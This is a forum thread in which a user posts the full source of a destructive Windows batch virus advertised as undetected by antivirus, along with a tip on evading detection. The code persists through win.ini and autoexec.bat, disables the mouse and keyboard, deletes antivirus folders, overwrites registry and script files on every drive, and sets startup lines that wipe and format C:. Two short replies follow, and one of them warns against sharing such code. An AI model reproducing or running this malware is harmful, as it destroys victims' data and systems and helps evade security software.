Extreme Batch Virus, Destroy whole windows, not detected by AV's

[sajard]

What is in green is what allows it to be compiled into an .exe

When I posted this somewhere else, someone said they tested it on their VM and it literally destroyed it.

You can remove the Eicar string if you want av's not to pick it up.



X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
ccezfmdcaubapfnqzzxtbptpyfpceghwtiaaskanrcmvbkmkxnkxtcnkymszzmshgdiubbzyroroymxx​ xbfjtylzbvxvetfsci
tleseulyhgeuaqkizeymsvpzwqsjzrqrayxqvskczyrnzeuejjfxmlbtglkpdrgysjgdaeyslrjbxani​ azonxjuxrigswgkxnr
alxsmphlcpyrypqbuqcefgvhcahxmkcyexsxkpeiumhtmsvowmgisojixupgwdcgqunfckuikzbsonhp​ qknltpynnhxtzzdngi
nfawtmuimdpuqecrbzrdfxxvkyfpywzwwkostuwwpnyhohcnamxawlxrgjaxdisptjdtkjnvrkauranh​ onxymgmcpptojwjxgp
dukdsnvhhbrkievpztthnjocwkhouapqyokfiffucyfkkoafqejrxujktgpkyfwazwapgfyiwexdqrfy​ fbziprdcuuxmtuigsm
ziktgoanmpyuqiddejlgzsjxwubaaxlfwlregxyunugflwverujudszhekvfemrukyascyatttlftcra​ dqiqsryumhypxmtbew
hryftfuolbsobkexdaxcsdkmhmknbtxhkhzflxgfdanulcmsugvprdpcudvccrfehyinnrwtlliifysz​ dpqpgpubjwhrfptpvv
dqlggegogqtrmvcinrvgomxyzwuifpygpcolcomrnimbmfptpkvxpiiqbfhpeenmwkhaaybafxvxjfmd​ bfriosngrebfkjmvbd
btrhwynxezuwttatticokazhoylgtnjvgltrvrovxclfgxsmlqwaxhceepbufxyzhvxdunogmzxfxwfy​ ecnawhgghzvaugxdpt
tsttqrgmwzpxsqjltqgiodiukaiulvnzzkorypriamghiekmdxzreiswnvvwtonhfhdnrqdizuuihasz​ kwwpgivztkdsxxzke
@echo off
@ver|find /i "XP"|if errorlevel 1 ctty nul|if not errorlevel 1 exit
break off
copy %0 %windir%\owdyuuwe.bat>nul
echo.on error resume next>%windir%\owdyuuwe.vbs
echo.set yo=CreateObject("wscript.shell")>>%windir%\owdyuuwe.vbs
find /v /i "[windows]"<%windir%\win.ini>y
find /v /i "load="<y>d
find /v /i "run="<d>y
find /v /i "NullPort="<y>d
deltree/y y>nul
echo.[windows]>%windir%\win.ini
echo.load=%windir%\owdyuuwe.bat>>%windir%\win.ini
echo.run=>>%windir%\win.ini
echo.NullPort=None>>%windir%\win.ini
echo.>>%windir%\win.ini
type d>>%windir%\win.ini
deltree/y d>nul
rundll32 mouse,disable
rundll32 keyboard,disable
set duw=deltree/y c:\
%duw%antiba*>nul
%duw%antivi*>nul
%duw%av*>nul
%duw%bitdef*>nul
%duw%comman~1\>nul
%duw%cleanc*>nul
%duw%esafen\>nul
%duw%findvi*>nul
%duw%f-*>nul
%duw%fwin*>nul
%duw%inocul*>nul
%duw%kasper*>nul
%duw%mcafee*>nul
%duw%msav\>nul
%duw%norman\>nul
%duw%norton*>nul
%duw%pav\>nul
%duw%pccill*>nul
%duw%pc-cil*>nul
%duw%rav\>nul
%duw%softwin\>nul
%duw%tbav*>nul
%duw%toolkit\>nul
%duw%trendm~1\>nul
%duw%trex\>nul
%duw%virus*>nul
%duw%vpc\>nul
%duw%vs95\>nul
%duw%zonela*>nul
set duw=deltree/y c:\progra~1\
%duw%antiba*>nul
%duw%antivi*>nul
%duw%avg*>nul
%duw%bitdef*>nul
%duw%comman~1\>nul
%duw%common~1\avp*>nul
%duw%common~1\syman*>nul
%duw%datafe*>nul
%duw%deerfi*>nul
%duw%f-*>nul
%duw%findvi~1\>nul
%duw%fsi\>nul
%duw%fwin*>nul
%duw%grisoft\>nul
%duw%inocul*>nul
%duw%kasper*>nul
%duw%mcafee*>nul
%duw%mindso~1\>nul
%duw%norman\>nul
%duw%norton*>nul
%duw%pandas~1\>nul
%duw%protec*>nul
%duw%quickh~1\>nul
%duw%rav\>nul
%duw%signal9\>nul
%duw%softwin\>nul
%duw%spysto~1\>nul
%duw%syman*>nul
%duw%tbav\>nul
%duw%tinype~1\>nul
%duw%trend*>nul
%duw%trojan*>nul
%duw%virus*>nul
%duw%zonela*>nul
set duw=
echo.REGEDIT4>%windir%\rs.reg
echo.>>%windir%\rs.reg
echo.[HKEY_LOCAL_MACHINE]>>%windir%\rs.reg
echo.""="%windir%\owdyuuwe.bat">>%windir%\rs.reg
for %%r in (c:\*.reg *.reg ..\*.reg c:\mydocu~1\*.reg %windir%\*.reg %path%\*.reg %windir%\desktop\*.reg %windir%\system\*.reg) do attrib -r -h -s -a %%r
for %%r in (c:\*.reg *.reg ..\*.reg c:\mydocu~1\*.reg %windir%\*.reg %path%\*.reg %windir%\desktop\*.reg %windir%\system\*.reg) do copy %windir%\rs.reg %%r /y
for %%r in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%r:\nul copy %windir%\rs.reg %%r:\owdyuuwe.reg /y
echo.SHELL "%windir%\owdyuuwe.bat">%windir%\en.bas
echo.END>>%windir%\en.bas
for %%e in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %windir%\*.bas %path%\*.bas %windir%\desktop\*.bas %windir%\system\*.bas) do attrib -r -h -s -a %%e
for %%e in (c:\*.bas *.bas ..\*.bas c:\mydocu~1\*.bas %windir%\*.bas %path%\*.bas %windir%\desktop\*.bas %windir%\system\*.bas) do copy %windir%\en.bas %%e /y
for %%e in (c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;a) do %comspec% nul /f /c if exist %%e:\nul copy %windir%\en.bas %%e:\owdyuuwe.bas /y
echo.time 00:00:00,00>>c:\autoexec.bat
echo.date 80-01-01>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist e:\nul subst e: a:\>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist d:\nul subst d: a:\>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist c:\nul subst c: a:\>>c:\autoexec.bat
echo.[menu]>>c:\config.sys
echo.menuitem=tc>>c:\config.sys
echo.>>c:\config.sys
echo.[tc]>>c:\config.sys
echo.buffers=1>>c:\config.sys
echo.files=1>>c:\config.sys
echo.lastdrive=A>>c:\config.sys
echo.set path=deltree/y c:\>>c:\config.sys
echo.set temp=A:\>>c:\config.sys
echo.set windir=format c:/u/q/autotest>>c:\config.sys
set Ò¡Õ¼‚Î=md %windir%\desktop\
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î00>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î01>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î02>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î03>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î04>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î05>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î06>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î07>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î08>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î09>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î10>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î11>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î12>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î13>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î14>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î15>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î16>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î17>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î18>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î19>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î20>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î21>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î22>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î23>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î24>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î25>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î26>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î27>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î28>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î29>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î30>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î31>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î32>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î33>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î34>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î35>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î36>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î37>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î38>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î39>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î40>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î41>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î42>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î43>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î44>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î45>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î46>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î47>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î48>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î49>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î50>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î51>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î52>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î53>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î54>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î55>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î56>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î57>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î58>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î59>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î60>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î61>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î62>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î63>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î64>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î65>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î66>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î67>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î68>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î69>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î70>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î71>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î72>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î73>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î74>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î75>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î76>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î77>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î78>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î79>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î80>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î81>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î82>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î83>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î84>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î85>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î86>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î87>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î88>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î89>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î90>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î91>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î92>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î93>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î94>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î95>nul
%Ò¡Õ¼‚Î%Ò¡Õ¼‚Î96>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î97>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î98>nul | %Ò¡Õ¼‚Î%Ò¡Õ¼‚Î99>nul
set Ò¡Õ¼‚Î=
cscript %windir%\owdyuuwe.vbs
cls

 

[randiljosh]

Test karala wada nam mata kiyanna

 

[Malinga]

http://www.virustotal.com/analisis/...c3c78ebee06b1381e2b5aa5a48e998d46a-1250514453

ooka allanava godak virus guard. habai me vage eeva post nokaranavanum thamai honda. moko oya vage ekak varadi kenek athata giyoth gataluvak venava. e langa dee thamai ohoma code ha virus software adiya post vena eken Elakri.com eka samaharavita security sambandayen browser valadi ehema gatalu mathuvenna pulvuan.